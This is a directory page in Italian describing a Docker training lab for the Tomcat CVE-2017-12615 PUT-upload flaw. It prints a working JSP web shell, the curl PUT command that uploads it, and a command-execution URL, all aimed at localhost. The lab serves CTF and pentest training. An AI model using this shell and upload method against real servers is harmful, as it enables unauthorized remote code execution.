Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2017-12615-Home-Lab — CVE-2017-12615 Tomcat: Esecuzione remota di codice tramite upload JSP — Home Lab per Red Teaming, Penetration Testing | Kitploit
Strumenti/GitHubGitHub/netw0rk7/cve-2017-12615-home-lab
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebCTFPenetration TestingApprendimento e FormazioneRed TeamingLab e Pratica
GitHubnetw0rk7/cve-2017-12615-home-lab

CVE-2017-12615-Home-Lab

CVE-2017-12615 Tomcat: Esecuzione remota di codice tramite upload JSP — Home Lab per Red Teaming, Penetration Testing

Vedi Repository
8 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Versione inglese di seguito

CVE-2017-12615 Tomcat: esecuzione remota di codice tramite upload JSP

immagine

Questo lab simula la vulnerabilità CVE-2017-12615 Tomcat: esecuzione remota di codice tramite upload JSP
Deriva dall'impostazione readonly=false, che consente di caricare file tramite HTTP PUT, inclusi file .jsp che possono eseguire comandi (RCE).


immagine

Funzionalità

  • Apache Tomcat 7.0.79 (vulnerabile)
  • Utilizza un override del DefaultServlet con valore readonly=false
  • Consente di utilizzare PUT Upload per inserire file .jsp nella directory web ROOT
  • Supporta l'esecuzione di comandi tramite web shell
  • Pagina web in stile industriale con una nota interna dimenticata (indizio)
  • Il sistema genera automaticamente flag_RANDOM.txt a ogni avvio del container
  • Progettato per CTF / Red Team / formazione Pentest

Struttura delle directory

root@kitploit:~
/opt/apache-tomcat-7.0.79/
/opt/apache-tomcat-7.0.79/webapps/ROOT/index.jsp
/opt/apache-tomcat-7.0.79/webapps/ROOT/WEB-INF/web.xml
/tmp/flag_RANDOM.txt
/docker-entrypoint.sh

Utilizzo (Esecuzione del container)

root@kitploit:~
docker compose build
docker compose up -d

Apri il sito web:

root@kitploit:~
http://localhost:8080/

Come testare la vulnerabilità CVE-2017-12615

1) Creare il file payload JSP

root@kitploit:~
cat > shell.jsp << 'EOF'
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
if (cmd != null) {
    String s;
    Process p = Runtime.getRuntime().exec(cmd);
    BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
    while ((s = r.readLine()) != null) out.println(s + "<br>");
}
%>
EOF

2) Caricare il file tramite PUT (deve esserci / alla fine del nome file)

root@kitploit:~
curl -v -X PUT "http://localhost:8080/shell.jsp/"   -H "Content-Type: text/plain"   --data-binary @shell.jsp

3) Utilizzare la webshell

root@kitploit:~
http://localhost:8080/shell.jsp?cmd=id

Flag

Salvata in:

root@kitploit:~
/tmp/flag_RANDOM.txt

Versione inglese — CVE-2017-12615 Tomcat: esecuzione remota di codice tramite upload JSP

Questo lab simula CVE-2017-12615 Tomcat: esecuzione remota di codice tramite upload JSP, in cui il DefaultServlet di Apache Tomcat è configurato erroneamente con:

root@kitploit:~
readonly=false

Questo consente agli attaccanti di caricare file .jsp tramite HTTP PUT, permettendo l'esecuzione remota di codice.


immagine

Funzionalità

  • Apache Tomcat 7.0.79 vulnerabile
  • Override del DefaultServlet con readonly=false
  • PUT Upload → scrive file .jsp arbitrari nella directory web ROOT
  • Supporta l'esecuzione di comandi tramite shell JSP
  • Pagina di presentazione in stile industriale con un sottile indizio interno
  • flag_RANDOM.txt generato automaticamente all'avvio del container
  • Adatto per CTF, ricerca e sviluppo di exploit

Esempio di sfruttamento

Caricare una shell JSP

root@kitploit:~
curl -v -X PUT "http://localhost:8080/shell.jsp/"   -H "Content-Type: text/plain"   --data-binary @shell.jsp

Eseguire comandi

root@kitploit:~
http://localhost:8080/shell.jsp?cmd=id

Posizione della flag

root@kitploit:~
/tmp/flag_RANDOM.txt

Dichiarazione di non responsabilità

Solo per scopi educativi, di ricerca e test di penetrazione autorizzati.

Scarica lo strumento